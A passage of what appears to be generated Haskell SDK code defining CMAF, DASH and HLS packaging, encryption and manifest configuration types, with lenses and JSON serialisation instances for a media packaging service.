= withObject "CmafEncryption"
(\ x ->
CmafEncryption' <$>
(x .:? "keyRotationIntervalSeconds") <*>
(x .: "spekeKeyProvider"))
-- Hashable and NFData use the Generic-derived default methods.
instance Hashable CmafEncryption where
instance NFData CmafEncryption where
-- JSON encoding mirrors decoding: the required provider is always
-- emitted ('Just'), the rotation interval only when present.
instance ToJSON CmafEncryption where
toJSON CmafEncryption'{..}
= object
(catMaybes
[("keyRotationIntervalSeconds" .=) <$>
_ceKeyRotationIntervalSeconds,
Just ("spekeKeyProvider" .= _ceSpekeKeyProvider)])
-- | A Common Media Application Format (CMAF) packaging configuration.
--
-- /See:/ 'cmafPackage' smart constructor.
data CmafPackage = CmafPackage'
{ _cpHlsManifests :: !(Maybe [HlsManifest])
, _cpSegmentDurationSeconds :: !(Maybe Int)
, _cpStreamSelection :: !(Maybe StreamSelection)
, _cpEncryption :: !(Maybe CmafEncryption)
, _cpSegmentPrefix :: !(Maybe Text)
} deriving (Eq, Read, Show, Data, Typeable, Generic)
-- | Creates a value of 'CmafPackage' with the minimum fields required to make a request.
--
-- Use one of the following lenses to modify other fields as desired:
--
-- * 'cpHlsManifests' - A list of HLS manifest configurations
--
-- * 'cpSegmentDurationSeconds' - Duration (in seconds) of each segment. Actual segments will be rounded to the nearest multiple of the source segment duration.
--
-- * 'cpStreamSelection' - Undocumented member.
--
-- * 'cpEncryption' - Undocumented member.
--
-- * 'cpSegmentPrefix' - An optional custom string that is prepended to the name of each segment. If not specified, it defaults to the ChannelId.
cmafPackage
:: CmafPackage
cmafPackage =
CmafPackage'
{ _cpHlsManifests = Nothing
, _cpSegmentDurationSeconds = Nothing
, _cpStreamSelection = Nothing
, _cpEncryption = Nothing
, _cpSegmentPrefix = Nothing
}
-- | A list of HLS manifest configurations
-- Note: the lens views 'Nothing' as the empty list via '_Default'.
cpHlsManifests :: Lens' CmafPackage [HlsManifest]
cpHlsManifests = lens _cpHlsManifests (\ s a -> s{_cpHlsManifests = a}) . _Default . _Coerce
-- | Duration (in seconds) of each segment. Actual segments will be rounded to the nearest multiple of the source segment duration.
cpSegmentDurationSeconds :: Lens' CmafPackage (Maybe Int)
cpSegmentDurationSeconds = lens _cpSegmentDurationSeconds (\ s a -> s{_cpSegmentDurationSeconds = a})
-- | Undocumented member.
cpStreamSelection :: Lens' CmafPackage (Maybe StreamSelection)
cpStreamSelection = lens _cpStreamSelection (\ s a -> s{_cpStreamSelection = a})
-- | Undocumented member.
cpEncryption :: Lens' CmafPackage (Maybe CmafEncryption)
cpEncryption = lens _cpEncryption (\ s a -> s{_cpEncryption = a})
-- | An optional custom string that is prepended to the name of each segment. If not specified, it defaults to the ChannelId.
cpSegmentPrefix :: Lens' CmafPackage (Maybe Text)
cpSegmentPrefix = lens _cpSegmentPrefix (\ s a -> s{_cpSegmentPrefix = a})
-- JSON decoding: all fields optional; a missing "hlsManifests" key
-- defaults to the empty list via '.!= mempty'.
instance FromJSON CmafPackage where
parseJSON
= withObject "CmafPackage"
(\ x ->
CmafPackage' <$>
(x .:? "hlsManifests" .!= mempty) <*>
(x .:? "segmentDurationSeconds")
<*> (x .:? "streamSelection")
<*> (x .:? "encryption")
<*> (x .:? "segmentPrefix"))
-- Hashable and NFData use the Generic-derived default methods.
instance Hashable CmafPackage where
instance NFData CmafPackage where
-- | A Common Media Application Format (CMAF) packaging configuration.
--
-- /See:/ 'cmafPackageCreateOrUpdateParameters' smart constructor.
data CmafPackageCreateOrUpdateParameters = CmafPackageCreateOrUpdateParameters'
{ _cpcoupHlsManifests :: !(Maybe [HlsManifestCreateOrUpdateParameters])
, _cpcoupSegmentDurationSeconds :: !(Maybe Int)
, _cpcoupStreamSelection :: !(Maybe StreamSelection)
, _cpcoupEncryption :: !(Maybe CmafEncryption)
, _cpcoupSegmentPrefix :: !(Maybe Text)
} deriving (Eq, Read, Show, Data, Typeable, Generic)
-- | Creates a value of 'CmafPackageCreateOrUpdateParameters' with the minimum fields required to make a request.
--
-- Use one of the following lenses to modify other fields as desired:
--
-- * 'cpcoupHlsManifests' - A list of HLS manifest configurations
--
-- * 'cpcoupSegmentDurationSeconds' - Duration (in seconds) of each segment. Actual segments will be rounded to the nearest multiple of the source segment duration.
--
-- * 'cpcoupStreamSelection' - Undocumented member.
--
-- * 'cpcoupEncryption' - Undocumented member.
--
-- * 'cpcoupSegmentPrefix' - An optional custom string that is prepended to the name of each segment. If not specified, it defaults to the ChannelId.
cmafPackageCreateOrUpdateParameters
:: CmafPackageCreateOrUpdateParameters
cmafPackageCreateOrUpdateParameters =
CmafPackageCreateOrUpdateParameters'
{ _cpcoupHlsManifests = Nothing
, _cpcoupSegmentDurationSeconds = Nothing
, _cpcoupStreamSelection = Nothing
, _cpcoupEncryption = Nothing
, _cpcoupSegmentPrefix = Nothing
}
-- | A list of HLS manifest configurations
-- Note: the lens views 'Nothing' as the empty list via '_Default'.
cpcoupHlsManifests :: Lens' CmafPackageCreateOrUpdateParameters [HlsManifestCreateOrUpdateParameters]
cpcoupHlsManifests = lens _cpcoupHlsManifests (\ s a -> s{_cpcoupHlsManifests = a}) . _Default . _Coerce
-- | Duration (in seconds) of each segment. Actual segments will be rounded to the nearest multiple of the source segment duration.
cpcoupSegmentDurationSeconds :: Lens' CmafPackageCreateOrUpdateParameters (Maybe Int)
cpcoupSegmentDurationSeconds = lens _cpcoupSegmentDurationSeconds (\ s a -> s{_cpcoupSegmentDurationSeconds = a})
-- | Undocumented member.
cpcoupStreamSelection :: Lens' CmafPackageCreateOrUpdateParameters (Maybe StreamSelection)
cpcoupStreamSelection = lens _cpcoupStreamSelection (\ s a -> s{_cpcoupStreamSelection = a})
-- | Undocumented member.
cpcoupEncryption :: Lens' CmafPackageCreateOrUpdateParameters (Maybe CmafEncryption)
cpcoupEncryption = lens _cpcoupEncryption (\ s a -> s{_cpcoupEncryption = a})
-- | An optional custom string that is prepended to the name of each segment. If not specified, it defaults to the ChannelId.
cpcoupSegmentPrefix :: Lens' CmafPackageCreateOrUpdateParameters (Maybe Text)
cpcoupSegmentPrefix = lens _cpcoupSegmentPrefix (\ s a -> s{_cpcoupSegmentPrefix = a})
-- Request-only type: it has ToJSON but (unlike 'CmafPackage') no
-- FromJSON instance.  Hashable/NFData use Generic-derived defaults.
instance Hashable CmafPackageCreateOrUpdateParameters
where
instance NFData CmafPackageCreateOrUpdateParameters
where
-- JSON encoding: every field is optional and omitted when 'Nothing'.
instance ToJSON CmafPackageCreateOrUpdateParameters
where
toJSON CmafPackageCreateOrUpdateParameters'{..}
= object
(catMaybes
[("hlsManifests" .=) <$> _cpcoupHlsManifests,
("segmentDurationSeconds" .=) <$>
_cpcoupSegmentDurationSeconds,
("streamSelection" .=) <$> _cpcoupStreamSelection,
("encryption" .=) <$> _cpcoupEncryption,
("segmentPrefix" .=) <$> _cpcoupSegmentPrefix])
-- | A Dynamic Adaptive Streaming over HTTP (DASH) encryption configuration.
--
-- /See:/ 'dashEncryption' smart constructor.
data DashEncryption = DashEncryption'
{ _deKeyRotationIntervalSeconds :: !(Maybe Int)
, _deSpekeKeyProvider :: !SpekeKeyProvider
} deriving (Eq, Read, Show, Data, Typeable, Generic)
-- | Creates a value of 'DashEncryption' with the minimum fields required to make a request.
--
-- Use one of the following lenses to modify other fields as desired:
--
-- * 'deKeyRotationIntervalSeconds' - Time (in seconds) between each encryption key rotation.
--
-- * 'deSpekeKeyProvider' - Undocumented member.
dashEncryption
:: SpekeKeyProvider -- ^ 'deSpekeKeyProvider'
-> DashEncryption
dashEncryption pSpekeKeyProvider_ =
DashEncryption'
{ _deKeyRotationIntervalSeconds = Nothing
, _deSpekeKeyProvider = pSpekeKeyProvider_
}
-- | Time (in seconds) between each encryption key rotation.
deKeyRotationIntervalSeconds :: Lens' DashEncryption (Maybe Int)
deKeyRotationIntervalSeconds = lens _deKeyRotationIntervalSeconds (\ s a -> s{_deKeyRotationIntervalSeconds = a})
-- | Undocumented member.
deSpekeKeyProvider :: Lens' DashEncryption SpekeKeyProvider
deSpekeKeyProvider = lens _deSpekeKeyProvider (\ s a -> s{_deSpekeKeyProvider = a})
-- JSON decoding: "spekeKeyProvider" uses '.:' and is therefore a
-- required field; decoding fails if it is absent.
instance FromJSON DashEncryption where
parseJSON
= withObject "DashEncryption"
(\ x ->
DashEncryption' <$>
(x .:? "keyRotationIntervalSeconds") <*>
(x .: "spekeKeyProvider"))
-- Hashable and NFData use the Generic-derived default methods.
instance Hashable DashEncryption where
instance NFData DashEncryption where
-- JSON encoding mirrors decoding: the required provider is always
-- emitted ('Just'), the rotation interval only when present.
instance ToJSON DashEncryption where
toJSON DashEncryption'{..}
= object
(catMaybes
[("keyRotationIntervalSeconds" .=) <$>
_deKeyRotationIntervalSeconds,
Just ("spekeKeyProvider" .= _deSpekeKeyProvider)])
-- | A Dynamic Adaptive Streaming over HTTP (DASH) packaging configuration.
--
-- /See:/ 'dashPackage' smart constructor.
data DashPackage = DashPackage'
{ _dpMinBufferTimeSeconds :: !(Maybe Int)
, _dpProfile :: !(Maybe Profile)
, _dpSegmentDurationSeconds :: !(Maybe Int)
, _dpStreamSelection :: !(Maybe StreamSelection)
, _dpEncryption :: !(Maybe DashEncryption)
, _dpMinUpdatePeriodSeconds :: !(Maybe Int)
, _dpSuggestedPresentationDelaySeconds :: !(Maybe Int)
, _dpManifestWindowSeconds :: !(Maybe Int)
} deriving (Eq, Read, Show, Data, Typeable, Generic)
-- | Creates a value of 'DashPackage' with the minimum fields required to make a request.
--
-- Use one of the following lenses to modify other fields as desired:
--
-- * 'dpMinBufferTimeSeconds' - Minimum duration (in seconds) that a player will buffer media before starting the presentation.
--
-- * 'dpProfile' - The Dynamic Adaptive Streaming over HTTP (DASH) profile type. When set to "HBBTV_1_5", HbbTV 1.5 compliant output is enabled.
--
-- * 'dpSegmentDurationSeconds' - Duration (in seconds) of each segment. Actual segments will be rounded to the nearest multiple of the source segment duration.
--
-- * 'dpStreamSelection' - Undocumented member.
--
-- * 'dpEncryption' - Undocumented member.
--
-- * 'dpMinUpdatePeriodSeconds' - Minimum duration (in seconds) between potential changes to the Dynamic Adaptive Streaming over HTTP (DASH) Media Presentation Description (MPD).
--
-- * 'dpSuggestedPresentationDelaySeconds' - Duration (in seconds) to delay live content before presentation.
--
-- * 'dpManifestWindowSeconds' - Time window (in seconds) contained in each manifest.
dashPackage
:: DashPackage
dashPackage =
DashPackage'
{ _dpMinBufferTimeSeconds = Nothing
, _dpProfile = Nothing
, _dpSegmentDurationSeconds = Nothing
, _dpStreamSelection = Nothing
, _dpEncryption = Nothing
, _dpMinUpdatePeriodSeconds = Nothing
, _dpSuggestedPresentationDelaySeconds = Nothing
, _dpManifestWindowSeconds = Nothing
}
-- | Minimum duration (in seconds) that a player will buffer media before starting the presentation.
dpMinBufferTimeSeconds :: Lens' DashPackage (Maybe Int)
dpMinBufferTimeSeconds = lens _dpMinBufferTimeSeconds (\ s a -> s{_dpMinBufferTimeSeconds = a})
-- | The Dynamic Adaptive Streaming over HTTP (DASH) profile type. When set to "HBBTV_1_5", HbbTV 1.5 compliant output is enabled.
dpProfile :: Lens' DashPackage (Maybe Profile)
dpProfile = lens _dpProfile (\ s a -> s{_dpProfile = a})
-- | Duration (in seconds) of each segment. Actual segments will be rounded to the nearest multiple of the source segment duration.
dpSegmentDurationSeconds :: Lens' DashPackage (Maybe Int)
dpSegmentDurationSeconds = lens _dpSegmentDurationSeconds (\ s a -> s{_dpSegmentDurationSeconds = a})
-- | Undocumented member.
dpStreamSelection :: Lens' DashPackage (Maybe StreamSelection)
dpStreamSelection = lens _dpStreamSelection (\ s a -> s{_dpStreamSelection = a})
-- | Undocumented member.
dpEncryption :: Lens' DashPackage (Maybe DashEncryption)
dpEncryption = lens _dpEncryption (\ s a -> s{_dpEncryption = a})
-- | Minimum duration (in seconds) between potential changes to the Dynamic Adaptive Streaming over HTTP (DASH) Media Presentation Description (MPD).
dpMinUpdatePeriodSeconds :: Lens' DashPackage (Maybe Int)
dpMinUpdatePeriodSeconds = lens _dpMinUpdatePeriodSeconds (\ s a -> s{_dpMinUpdatePeriodSeconds = a})
-- | Duration (in seconds) to delay live content before presentation.
dpSuggestedPresentationDelaySeconds :: Lens' DashPackage (Maybe Int)
dpSuggestedPresentationDelaySeconds = lens _dpSuggestedPresentationDelaySeconds (\ s a -> s{_dpSuggestedPresentationDelaySeconds = a})
-- | Time window (in seconds) contained in each manifest.
dpManifestWindowSeconds :: Lens' DashPackage (Maybe Int)
dpManifestWindowSeconds = lens _dpManifestWindowSeconds (\ s a -> s{_dpManifestWindowSeconds = a})
-- JSON decoding: every field uses '.:?' and is optional.
instance FromJSON DashPackage where
parseJSON
= withObject "DashPackage"
(\ x ->
DashPackage' <$>
(x .:? "minBufferTimeSeconds") <*> (x .:? "profile")
<*> (x .:? "segmentDurationSeconds")
<*> (x .:? "streamSelection")
<*> (x .:? "encryption")
<*> (x .:? "minUpdatePeriodSeconds")
<*> (x .:? "suggestedPresentationDelaySeconds")
<*> (x .:? "manifestWindowSeconds"))
-- Hashable and NFData use the Generic-derived default methods.
instance Hashable DashPackage where
instance NFData DashPackage where
-- JSON encoding: every field is optional and omitted when 'Nothing'.
instance ToJSON DashPackage where
toJSON DashPackage'{..}
= object
(catMaybes
[("minBufferTimeSeconds" .=) <$>
_dpMinBufferTimeSeconds,
("profile" .=) <$> _dpProfile,
("segmentDurationSeconds" .=) <$>
_dpSegmentDurationSeconds,
("streamSelection" .=) <$> _dpStreamSelection,
("encryption" .=) <$> _dpEncryption,
("minUpdatePeriodSeconds" .=) <$>
_dpMinUpdatePeriodSeconds,
("suggestedPresentationDelaySeconds" .=) <$>
_dpSuggestedPresentationDelaySeconds,
("manifestWindowSeconds" .=) <$>
_dpManifestWindowSeconds])
-- | An HTTP Live Streaming (HLS) encryption configuration.
--
-- /See:/ 'hlsEncryption' smart constructor.
data HlsEncryption = HlsEncryption'
{ _heEncryptionMethod :: !(Maybe EncryptionMethod)
, _heKeyRotationIntervalSeconds :: !(Maybe Int)
, _heConstantInitializationVector :: !(Maybe Text)
, _heRepeatExtXKey :: !(Maybe Bool)
, _heSpekeKeyProvider :: !SpekeKeyProvider
} deriving (Eq, Read, Show, Data, Typeable, Generic)
-- | Creates a value of 'HlsEncryption' with the minimum fields required to make a request.
--
-- Use one of the following lenses to modify other fields as desired:
--
-- * 'heEncryptionMethod' - The encryption method to use.
--
-- * 'heKeyRotationIntervalSeconds' - Interval (in seconds) between each encryption key rotation.
--
-- * 'heConstantInitializationVector' - A constant initialization vector for encryption (optional). When not specified the initialization vector will be periodically rotated.
--
-- * 'heRepeatExtXKey' - When enabled, the EXT-X-KEY tag will be repeated in output manifests.
--
-- * 'heSpekeKeyProvider' - Undocumented member.
hlsEncryption
:: SpekeKeyProvider -- ^ 'heSpekeKeyProvider'
-> HlsEncryption
hlsEncryption pSpekeKeyProvider_ =
HlsEncryption'
{ _heEncryptionMethod = Nothing
, _heKeyRotationIntervalSeconds = Nothing
, _heConstantInitializationVector = Nothing
, _heRepeatExtXKey = Nothing
, _heSpekeKeyProvider = pSpekeKeyProvider_
}
-- | The encryption method to use.
heEncryptionMethod :: Lens' HlsEncryption (Maybe EncryptionMethod)
heEncryptionMethod = lens _heEncryptionMethod (\ s a -> s{_heEncryptionMethod = a})
-- | Interval (in seconds) between each encryption key rotation.
heKeyRotationIntervalSeconds :: Lens' HlsEncryption (Maybe Int)
heKeyRotationIntervalSeconds = lens _heKeyRotationIntervalSeconds (\ s a -> s{_heKeyRotationIntervalSeconds = a})
-- | A constant initialization vector for encryption (optional). When not specified the initialization vector will be periodically rotated.
heConstantInitializationVector :: Lens' HlsEncryption (Maybe Text)
heConstantInitializationVector = lens _heConstantInitializationVector (\ s a -> s{_heConstantInitializationVector = a})
-- | When enabled, the EXT-X-KEY tag will be repeated in output manifests.
heRepeatExtXKey :: Lens' HlsEncryption (Maybe Bool)
heRepeatExtXKey = lens _heRepeatExtXKey (\ s a -> s{_heRepeatExtXKey = a})
-- | Undocumented member.
heSpekeKeyProvider :: Lens' HlsEncryption SpekeKeyProvider
heSpekeKeyProvider = lens _heSpekeKeyProvider (\ s a -> s{_heSpekeKeyProvider = a})
-- JSON decoding: "spekeKeyProvider" uses '.:' and is therefore a
-- required field; all other fields are optional ('.:?').
instance FromJSON HlsEncryption where
parseJSON
= withObject "HlsEncryption"
(\ x ->
HlsEncryption' <$>
(x .:? "encryptionMethod") <*>
(x .:? "keyRotationIntervalSeconds")
<*> (x .:? "constantInitializationVector")
<*> (x .:? "repeatExtXKey")
<*> (x .: "spekeKeyProvider"))
-- Hashable and NFData use the Generic-derived default methods.
instance Hashable HlsEncryption where
instance NFData HlsEncryption where
-- JSON encoding mirrors decoding: the required provider is always
-- emitted ('Just'), optional fields only when present.
instance ToJSON HlsEncryption where
toJSON HlsEncryption'{..}
= object
(catMaybes
[("encryptionMethod" .=) <$> _heEncryptionMethod,
("keyRotationIntervalSeconds" .=) <$>
_heKeyRotationIntervalSeconds,
("constantInitializationVector" .=) <$>
_heConstantInitializationVector,
("repeatExtXKey" .=) <$> _heRepeatExtXKey,
Just ("spekeKeyProvider" .= _heSpekeKeyProvider)])
-- | An HTTP Live Streaming (HLS) ingest resource configuration.
--
-- /See:/ 'hlsIngest' smart constructor.
-- Single-field wrapper, hence 'newtype' rather than 'data'.
newtype HlsIngest = HlsIngest'
{ _hiIngestEndpoints :: Maybe [IngestEndpoint]
} deriving (Eq, Read, Show, Data, Typeable, Generic)
-- | Creates a value of 'HlsIngest' with the minimum fields required to make a request.
--
-- Use one of the following lenses to modify other fields as desired:
--
-- * 'hiIngestEndpoints' - A list of endpoints to which the source stream should be sent.
hlsIngest
:: HlsIngest
hlsIngest = HlsIngest' {_hiIngestEndpoints = Nothing}
-- | A list of endpoints to which the source stream should be sent.
-- Note: the lens views 'Nothing' as the empty list via '_Default'.
hiIngestEndpoints :: Lens' HlsIngest [IngestEndpoint]
hiIngestEndpoints = lens _hiIngestEndpoints (\ s a -> s{_hiIngestEndpoints = a}) . _Default . _Coerce
-- JSON decoding: a missing "ingestEndpoints" key defaults to the
-- empty list via '.!= mempty'.
instance FromJSON HlsIngest where
parseJSON
= withObject "HlsIngest"
(\ x ->
HlsIngest' <$> (x .:? "ingestEndpoints" .!= mempty))
-- Hashable and NFData use the Generic-derived default methods.
instance Hashable HlsIngest where
instance NFData HlsIngest where
-- | A HTTP Live Streaming (HLS) manifest configuration.
--
-- /See:/ 'hlsManifest' smart constructor.
data HlsManifest = HlsManifest'
{ _hmManifestName :: !(Maybe Text)
, _hmURL :: !(Maybe Text)
, _hmPlaylistType :: !(Maybe PlaylistType)
, _hmProgramDateTimeIntervalSeconds :: !(Maybe Int)
, _hmAdMarkers :: !(Maybe AdMarkers)
, _hmIncludeIframeOnlyStream :: !(Maybe Bool)
, _hmPlaylistWindowSeconds :: !(Maybe Int)
, _hmId :: !Text
} deriving (Eq, Read, Show, Data, Typeable, Generic)
-- | Creates a value of 'HlsManifest' with the minimum fields required to make a request.
--
-- Use one of the following lenses to modify other fields as desired:
--
-- * 'hmManifestName' - An optional short string appended to the end of the OriginEndpoint URL. If not specified, defaults to the manifestName for the OriginEndpoint.
--
-- * 'hmURL' - The URL of the packaged OriginEndpoint for consumption.
--
-- * 'hmPlaylistType' - The HTTP Live Streaming (HLS) playlist type. When either "EVENT" or "VOD" is specified, a corresponding EXT-X-PLAYLIST-TYPE entry will be included in the media playlist.
--
-- * 'hmProgramDateTimeIntervalSeconds' - The interval (in seconds) between each EXT-X-PROGRAM-DATE-TIME tag inserted into manifests. Additionally, when an interval is specified ID3Timed Metadata messages will be generated every 5 seconds using the ingest time of the content. If the interval is not specified, or set to 0, then no EXT-X-PROGRAM-DATE-TIME tags will be inserted into manifests and no ID3Timed Metadata messages will be generated. Note that irrespective of this parameter, if any ID3 Timed Metadata is found in HTTP Live Streaming (HLS) input, it will be passed through to HLS output.
--
-- * 'hmAdMarkers' - This setting controls how ad markers are included in the packaged OriginEndpoint. "NONE" will omit all SCTE-35 ad markers from the output. "PASSTHROUGH" causes the manifest to contain a copy of the SCTE-35 ad markers (comments) taken directly from the input HTTP Live Streaming (HLS) manifest. "SCTE35_ENHANCED" generates ad markers and blackout tags based on SCTE-35 messages in the input source.
--
-- * 'hmIncludeIframeOnlyStream' - When enabled, an I-Frame only stream will be included in the output.
--
-- * 'hmPlaylistWindowSeconds' - Time window (in seconds) contained in each parent manifest.
--
-- * 'hmId' - The ID of the manifest. The ID must be unique within the OriginEndpoint and it cannot be changed after it is created.
hlsManifest
:: Text -- ^ 'hmId'
-> HlsManifest
hlsManifest pId_ =
HlsManifest'
{ _hmManifestName = Nothing
, _hmURL = Nothing
, _hmPlaylistType = Nothing
, _hmProgramDateTimeIntervalSeconds = Nothing
, _hmAdMarkers = Nothing
, _hmIncludeIframeOnlyStream = Nothing
, _hmPlaylistWindowSeconds = Nothing
, _hmId = pId_
}
-- | An optional short string appended to the end of the OriginEndpoint URL. If not specified, defaults to the manifestName for the OriginEndpoint.
hmManifestName :: Lens' HlsManifest (Maybe Text)
hmManifestName = lens _hmManifestName (\ s a -> s{_hmManifestName = a})
-- | The URL of the packaged OriginEndpoint for consumption.
hmURL :: Lens' HlsManifest (Maybe Text)
hmURL = lens _hmURL (\ s a -> s{_hmURL = a})
-- | The HTTP Live Streaming (HLS) playlist type. When either "EVENT" or "VOD" is specified, a corresponding EXT-X-PLAYLIST-TYPE entry will be included in the media playlist.
hmPlaylistType :: Lens' HlsManifest (Maybe PlaylistType)
hmPlaylistType = lens _hmPlaylistType (\ s a -> s{_hmPlaylistType = a})
-- | The interval (in seconds) between each EXT-X-PROGRAM-DATE-TIME tag inserted into manifests. Additionally, when an interval is specified ID3Timed Metadata messages will be generated every 5 seconds using the ingest time of the content. If the interval is not specified, or set to 0, then no EXT-X-PROGRAM-DATE-TIME tags will be inserted into manifests and no ID3Timed Metadata messages will be generated. Note that irrespective of this parameter, if any ID3 Timed Metadata is found in HTTP Live Streaming (HLS) input, it will be passed through to HLS output.
hmProgramDateTimeIntervalSeconds :: Lens' HlsManifest (Maybe Int)
hmProgramDateTimeIntervalSeconds = lens _hmProgramDateTimeIntervalSeconds (\ s a -> s{_hmProgramDateTimeIntervalSeconds = a})
-- | This setting controls how ad markers are included in the packaged OriginEndpoint. "NONE" will omit all SCTE-35 ad markers from the output. "PASSTHROUGH" causes the manifest to contain a copy of the SCTE-35 ad markers (comments) taken directly from the input HTTP Live Streaming (HLS) manifest. "SCTE35_ENHANCED" generates ad markers and blackout tags based on SCTE-35 messages in the input source.
hmAdMarkers :: Lens' HlsManifest (Maybe AdMarkers)
hmAdMarkers = lens _hmAdMarkers (\ s a -> s{_hmAdMarkers = a})
-- | When enabled, an I-Frame only stream will be included in the output.
hmIncludeIframeOnlyStream :: Lens' HlsManifest (Maybe Bool)
hmIncludeIframeOnlyStream = lens _hmIncludeIframeOnlyStream (\ s a -> s{_hmIncludeIframeOnlyStream = a})
-- | Time window (in seconds) contained in each parent manifest.
hmPlaylistWindowSeconds :: Lens' HlsManifest (Maybe Int)
hmPlaylistWindowSeconds = lens _hmPlaylistWindowSeconds (\ s a -> s{_hmPlaylistWindowSeconds = a})
-- | The ID of the manifest. The ID must be unique within the OriginEndpoint and it cannot be changed after it is created.
hmId :: Lens' HlsManifest Text
hmId = lens _hmId (\ s a -> s{_hmId = a})
-- JSON decoding for 'HlsManifest': optional fields use (.:?); "id" is the
-- only required field, so it uses (.:) and parsing fails if it is absent.
instance FromJSON HlsManifest where
        parseJSON
          = withObject "HlsManifest"
              (\ x ->
                 HlsManifest' <$>
                   (x .:? "manifestName") <*> (x .:? "url") <*>
                     (x .:? "playlistType")
                     <*> (x .:? "programDateTimeIntervalSeconds")
                     <*> (x .:? "adMarkers")
                     <*> (x .:? "includeIframeOnlyStream")
                     <*> (x .:? "playlistWindowSeconds")
                     <*> (x .: "id"))
-- Empty instance bodies: 'Hashable' and 'NFData' use their Generic-derived
-- default implementations.
instance Hashable HlsManifest where
instance NFData HlsManifest where
-- | Parameters used when creating or updating an HTTP Live Streaming (HLS)
-- manifest on an OriginEndpoint.
--
-- /See:/ 'hlsManifestCreateOrUpdateParameters' smart constructor.
data HlsManifestCreateOrUpdateParameters = HlsManifestCreateOrUpdateParameters'
  { _hmcoupManifestName :: !(Maybe Text)
  , _hmcoupPlaylistType :: !(Maybe PlaylistType)
  , _hmcoupProgramDateTimeIntervalSeconds :: !(Maybe Int)
  , _hmcoupAdMarkers :: !(Maybe AdMarkers)
  , _hmcoupIncludeIframeOnlyStream :: !(Maybe Bool)
  , _hmcoupPlaylistWindowSeconds :: !(Maybe Int)
  , _hmcoupId :: !Text
  } deriving (Eq, Read, Show, Data, Typeable, Generic)
-- | Creates a value of 'HlsManifestCreateOrUpdateParameters' with the minimum fields required to make a request.
--
-- Use one of the following lenses to modify other fields as desired:
--
-- * 'hmcoupManifestName' - An optional short string appended to the end of the OriginEndpoint URL. If not specified, defaults to the manifestName for the OriginEndpoint.
--
-- * 'hmcoupPlaylistType' - The HTTP Live Streaming (HLS) playlist type. When either "EVENT" or "VOD" is specified, a corresponding EXT-X-PLAYLIST-TYPE entry will be included in the media playlist.
--
-- * 'hmcoupProgramDateTimeIntervalSeconds' - The interval (in seconds) between each EXT-X-PROGRAM-DATE-TIME tag inserted into manifests. Additionally, when an interval is specified ID3Timed Metadata messages will be generated every 5 seconds using the ingest time of the content. If the interval is not specified, or set to 0, then no EXT-X-PROGRAM-DATE-TIME tags will be inserted into manifests and no ID3Timed Metadata messages will be generated. Note that irrespective of this parameter, if any ID3 Timed Metadata is found in HTTP Live Streaming (HLS) input, it will be passed through to HLS output.
--
-- * 'hmcoupAdMarkers' - This setting controls how ad markers are included in the packaged OriginEndpoint. "NONE" will omit all SCTE-35 ad markers from the output. "PASSTHROUGH" causes the manifest to contain a copy of the SCTE-35 ad markers (comments) taken directly from the input HTTP Live Streaming (HLS) manifest. "SCTE35_ENHANCED" generates ad markers and blackout tags based on SCTE-35 messages in the input source.
--
-- * 'hmcoupIncludeIframeOnlyStream' - When enabled, an I-Frame only stream will be included in the output.
--
-- * 'hmcoupPlaylistWindowSeconds' - Time window (in seconds) contained in each parent manifest.
--
-- * 'hmcoupId' - The ID of the manifest. The ID must be unique within the OriginEndpoint and it cannot be changed after it is created.
hlsManifestCreateOrUpdateParameters
    :: Text -- ^ 'hmcoupId'
    -> HlsManifestCreateOrUpdateParameters
hlsManifestCreateOrUpdateParameters pId_ =
  HlsManifestCreateOrUpdateParameters'
    { _hmcoupManifestName = Nothing
    , _hmcoupPlaylistType = Nothing
    , _hmcoupProgramDateTimeIntervalSeconds = Nothing
    , _hmcoupAdMarkers = Nothing
    , _hmcoupIncludeIframeOnlyStream = Nothing
    , _hmcoupPlaylistWindowSeconds = Nothing
    , _hmcoupId = pId_
    }
-- | An optional short string appended to the end of the OriginEndpoint URL. If not specified, defaults to the manifestName for the OriginEndpoint.
hmcoupManifestName :: Lens' HlsManifestCreateOrUpdateParameters (Maybe Text)
hmcoupManifestName = lens _hmcoupManifestName (\ s a -> s{_hmcoupManifestName = a})
-- | The HTTP Live Streaming (HLS) playlist type. When either "EVENT" or "VOD" is specified, a corresponding EXT-X-PLAYLIST-TYPE entry will be included in the media playlist.
hmcoupPlaylistType :: Lens' HlsManifestCreateOrUpdateParameters (Maybe PlaylistType)
hmcoupPlaylistType = lens _hmcoupPlaylistType (\ s a -> s{_hmcoupPlaylistType = a})
-- | The interval (in seconds) between each EXT-X-PROGRAM-DATE-TIME tag inserted into manifests. Additionally, when an interval is specified ID3Timed Metadata messages will be generated every 5 seconds using the ingest time of the content. If the interval is not specified, or set to 0, then no EXT-X-PROGRAM-DATE-TIME tags will be inserted into manifests and no ID3Timed Metadata messages will be generated. Note that irrespective of this parameter, if any ID3 Timed Metadata is found in HTTP Live Streaming (HLS) input, it will be passed through to HLS output.
hmcoupProgramDateTimeIntervalSeconds :: Lens' HlsManifestCreateOrUpdateParameters (Maybe Int)
hmcoupProgramDateTimeIntervalSeconds = lens _hmcoupProgramDateTimeIntervalSeconds (\ s a -> s{_hmcoupProgramDateTimeIntervalSeconds = a})
-- | This setting controls how ad markers are included in the packaged OriginEndpoint. "NONE" will omit all SCTE-35 ad markers from the output. "PASSTHROUGH" causes the manifest to contain a copy of the SCTE-35 ad markers (comments) taken directly from the input HTTP Live Streaming (HLS) manifest. "SCTE35_ENHANCED" generates ad markers and blackout tags based on SCTE-35 messages in the input source.
hmcoupAdMarkers :: Lens' HlsManifestCreateOrUpdateParameters (Maybe AdMarkers)
hmcoupAdMarkers = lens _hmcoupAdMarkers (\ s a -> s{_hmcoupAdMarkers = a})
-- | When enabled, an I-Frame only stream will be included in the output.
hmcoupIncludeIframeOnlyStream :: Lens' HlsManifestCreateOrUpdateParameters (Maybe Bool)
hmcoupIncludeIframeOnlyStream = lens _hmcoupIncludeIframeOnlyStream (\ s a -> s{_hmcoupIncludeIframeOnlyStream = a})
-- | Time window (in seconds) contained in each parent manifest.
hmcoupPlaylistWindowSeconds :: Lens' HlsManifestCreateOrUpdateParameters (Maybe Int)
hmcoupPlaylistWindowSeconds = lens _hmcoupPlaylistWindowSeconds (\ s a -> s{_hmcoupPlaylistWindowSeconds = a})
-- | The ID of the manifest. The ID must be unique within the OriginEndpoint and it cannot be changed after it is created.
hmcoupId :: Lens' HlsManifestCreateOrUpdateParameters Text
hmcoupId = lens _hmcoupId (\ s a -> s{_hmcoupId = a})
instance Hashable HlsManifestCreateOrUpdateParameters
         where
instance NFData HlsManifestCreateOrUpdateParameters
         where
-- JSON encoding: optional fields are dropped from the object when Nothing
